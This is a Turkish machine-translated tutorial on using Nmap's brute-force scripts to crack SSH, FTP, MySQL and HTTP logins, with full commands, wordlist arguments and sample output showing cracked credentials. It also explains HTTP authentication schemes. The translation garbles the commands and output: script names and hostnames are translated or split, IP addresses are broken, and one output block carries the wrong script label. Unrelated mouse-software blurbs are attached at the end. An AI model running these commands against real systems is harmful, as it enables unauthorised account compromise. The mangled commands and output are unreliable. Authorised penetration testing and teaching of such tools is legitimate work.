Nmap

Nmap kullanarak parola kaba zorlama

Nmap kullanarak parola kaba zorlama
Çevrimiçi hizmetleri kaba kuvvet uygulamak için insanlar normalde Hydra, Medusa ve Metasploit Çerçevesini kullanır, ancak Nmap ayrıca birçok çevrimiçi hizmeti kaba kuvvet uygulamak için de kullanılabilir. FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP ve diğer çeşitli hizmetleri destekleyen yerleşik Nmap komut dosyaları vardır. Ayrıca HTTP form tabanlı, temel ve özet kimlik doğrulama yöntemlerini kaba kuvvet uygulayabilirsiniz. Eğer Nmap kurulu ise “/usr/share/nmap/scripts” dizininde bu scriptleri görebilirsiniz.

[e-posta korumalı]:~$ sudo apt update && sudo apt upgrade
[e-posta korumalı]:~$ sudo apt install nmap -y
[e-posta korumalı]:~$ cd /usr/share/nmap/scripts/
[e-posta korumalı]:~$ ls *kaba*

Bu derste, kaba kuvvet saldırısı için Nmap'i nasıl kullanabileceğimizi keşfedeceğiz.

SSH Kaba Kuvvet

SSH, güvenli bir uzaktan yönetim protokolüdür ve openssl ve parola tabanlı kimlik doğrulamayı destekler. SSH parola tabanlı kimlik doğrulamasını kaba kuvvet uygulamak için “ssh-brute.nse” Nmap betiği.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls *ssh*brute*
kaba.nse

Kullanıcı adı ve şifre listesini Nmap'e argüman olarak iletin.

[e-posta korumalı]:~$ nmap --script ssh-brute -p22 192.168.43.181
--script-args userdb=kullanıcılar.txt,passdb=şifreler.Txt
Nmap 7'yi Başlatma.70 ( https://nmap.org ) at 2020-02-08 17:09 PKT
192 için Nmap tarama raporu.168.43.181
Ana bilgisayar çalışıyor (0.00033s gecikme).
LİMAN   DEVLET HİZMETİ
22/tcp açık  ssh
| ssh-kaba:
| Hesaplar:
| admin:p4ssw0rd - Geçerli kimlik bilgileri
|_  İstatistikler: 60 saniyede 99 tahmin yapıldı, ortalama tps: 1.7
Nmap yapıldı: 60'da 1 IP adresi (1 ana bilgisayar yukarı) tarandı.17 saniye

FTP Kaba Kuvvet

FTP, parola tabanlı kimlik doğrulamayı destekleyen bir Dosya Aktarım Protokolüdür. FTP'yi kaba kuvvet uygulamak için “ftp-brute.nse” Nmap betiği.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls *ftp*brute*
ftp kaba.nse

Kullanıcı adı ve şifre listesini Nmap'e argüman olarak iletin.

[e-posta korumalı]:~$ nmap --script ftp-brute -p21 192.168.43.181 --script-arg'lar
userdb=kullanıcılar.txt,passdb=şifreler.Txt
Nmap 7'yi Başlatma.70 ( https://nmap.org ) at 2020-02-08 16:51 PKT
192 için Nmap tarama raporu.168.43.181
Ana bilgisayar çalışıyor (0.00021s gecikme).
LİMAN   DEVLET HİZMETİ
21/tcp açık ftp
| ftp-kaba:
| Hesaplar:
| admin:p4ssw0rd - Geçerli kimlik bilgileri
|_  İstatistikler: 20 saniyede 99 tahmin yapıldı, ortalama tps: 5.0
Nmap yapıldı: 19'da taranan 1 IP adresi (1 ana bilgisayar yukarı).50 saniye

MYSQL Kaba Kuvvet

Bazen MySQL dış bağlantılara açık bırakılır ve herkesin ona bağlanmasına izin verir. Şifresi, "mysql-brute" betiği ile Nmap kullanılarak kırılabilir.

[e-posta korumalı]:~$ sudo nmap --script mysql-brute -p3306 192.168.43.181
--script-args userdb=kullanıcılar.txt, passdb=şifreler.Txt
Nmap 7'yi Başlatma.70 ( https://nmap.org ) at 2020-02-08 16:51 PKT
192 için Nmap tarama raporu.168.43.181
Ana bilgisayar çalışıyor (0.00021s gecikme).
LİMAN   DEVLET HİZMETİ
3306/tcp açık  mysql
| ftp-kaba:
| Hesaplar:
| admin:p4ssw0rd - Geçerli kimlik bilgileri
|_  İstatistikler: 20 saniyede 99 tahmin yapıldı, ortalama tps: 5.0
Nmap yapıldı: 19'da taranan 1 IP adresi (1 ana bilgisayar yukarı).40 saniye

HTTP Kaba Kuvvet

HTTP, kullanıcıların kimliğini web sunucularına doğrulamak için üç tür kimlik doğrulama kullanır. Bu metodolojiler, kullanıcı adlarını ve şifreleri değiştirmek için yönlendiricilerde, modemlerde ve gelişmiş web uygulamalarında kullanılır. Bu türler:

Temel Kimlik Doğrulama

HTTP temel kimlik doğrulama protokolünde tarayıcı, kullanıcı adı ve şifreyi base64 ile kodlar ve “Yetkilendirme” başlığı altında gönderir. Bunu aşağıdaki ekran görüntüsünde görebilirsiniz.

Yetkilendirme: Temel YWRtaW46YWRtaW4=

Kullanıcı adını ve şifreyi görmek için bu dizenin kodunu base64 çözebilirsiniz

[e-posta korumalı]:~$ echo YWRtaW46YWRtaW4= | base64 -d
yönetici: yönetici

HTTP temel kimlik doğrulaması güvenli değil çünkü hem kullanıcı adını hem de parolayı düz metin olarak gönderiyor. Herhangi bir Ortadaki Adam Saldırgan, trafiği kolayca kesebilir ve şifreyi almak için dizenin kodunu çözebilir.

Özet Kimlik Doğrulaması

HTTP Özet Kimlik Doğrulaması, sunucuya göndermeden önce kullanıcı adını ve parolayı şifrelemek için karma teknikleri kullanır.

Hash1 = MD5(kullanıcı adı : bölge : şifre)
Hash2=MD5(yöntem: özetURI)
yanıt=MD5(Hash1 : nonce : nonceCount : cnonce : qop : Hash2)

Bu değerleri “Yetkilendirme” başlığı altında görebilirsiniz.

Parola düz metin olarak gönderilmediğinden özet tabanlı kimlik doğrulama güvenlidir. Ortadaki Adam saldırganı trafiği keserse, düz metin şifresini alamaz.

Form Tabanlı Kimlik Doğrulama

Temel ve Özet kimlik doğrulamaları yalnızca kullanıcı adı ve parola aktarımını desteklerken, Form tabanlı kimlik doğrulama, kullanıcının ihtiyaçlarına göre özelleştirilebilir. Kendi kodlama ve aktarım tekniklerinizi uygulamak için HTML veya JavaScript'te kendi web sayfanızı oluşturabilirsiniz.

Genellikle Form Tabanlı kimlik doğrulamadaki veriler düz metin olarak gönderilir. Güvenlik sorunları için, Ortadaki Adam saldırılarını önlemek için HTTP'ler uygulanmalıdır.

Nmap kullanarak her tür HTTP kimlik doğrulamasını kaba kuvvet uygulayabiliriz. Bu amaçla “http-brute” komut dosyasını kullanacağız.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls *http*brute*
http-kaba.nse

Bu Nmap komut dosyasını test etmek için, bu URL'de pentester akademisi tarafından herkese açık olarak barındırılan bir kaba kuvvet mücadelesini çözeceğiz http://pentesteracademylab.uygulama noktası.com/lab/webapp/basicauth.

Ana bilgisayar adı, URI, istek yöntemi ve sözlükler dahil her şeyi komut dosyası argümanı olarak ayrı ayrı sağlamamız gerekiyor.

[e-posta korumalı]:~$ sudo nmap -p80 --script http-brute pentesteracademylab.uygulama noktası.com
--script-args http-brute.ana bilgisayar adı=pentesteracademylab.uygulama noktası.com,
http-kaba.yol=/lab/webapp/basicauth, userdb=kullanıcılar.txt, passdb=şifreler.Txt,
http-kaba.yöntem=POST
 
Nmap 7'yi Başlatma.70 ( https://nmap.org ) at 2020-02-08 21:37 PKT
pentesteracademylab için Nmap tarama raporu.uygulama noktası.iletişim (216.58.210.84)
Ana bilgisayar çalışıyor (0.20s gecikme).
pentesteracademylab için diğer adresler.uygulama noktası.com (taranmamış): 2a00:1450:4018:803::2014
216 için rDNS kaydı.58.210.84: mct01s06-in-f84.1e100.ağ
 
LİMAN   DEVLET HİZMETİ
80/tcp açık  http
| http-kaba:
| Hesaplar:
| admin:aaddd - Geçerli kimlik bilgileri
|_  İstatistikler: 29 saniyede 165 tahmin yapıldı, ortalama tps: 5.3
Nmap yapıldı: 31'de taranan 1 IP adresi (1 ana bilgisayar yukarı).22 saniye

Sonuç

Nmap, yalnızca basit bağlantı noktası taramasına rağmen birçok şey yapmak için kullanılabilir. Özellikle çevrimiçi kaba zorlama için yapılmış Metasploit, Hydra, Medusa ve diğer birçok aracın yerini alabilir. Nmap, HTTP, TELNEL, SSH, MySQL, Samba ve diğerleri dahil olmak üzere hemen hemen her hizmeti kaba kuvvet uygulayan basit, kullanımı kolay yerleşik komut dosyalarına sahiptir.

Fare Control & manage mouse movement between multiple monitors in Windows 10
Control & manage mouse movement between multiple monitors in Windows 10
Dual Display Mouse Manager lets you control & configure mouse movement between multiple monitors, by slowing down its movements near the border. Windo...
Fare WinMouse lets you customize & improve mouse pointer movement on Windows PC
WinMouse lets you customize & improve mouse pointer movement on Windows PC
If you want to improve the default functions of your mouse pointer use freeware WinMouse. It adds more features to help you get the most out of your h...
Fare Mouse left-click button not working on Windows 10
Mouse left-click button not working on Windows 10
If you are using a dedicated mouse with your laptop, or desktop computer but the mouse left-click button is not working on Windows 10/8/7 for some rea...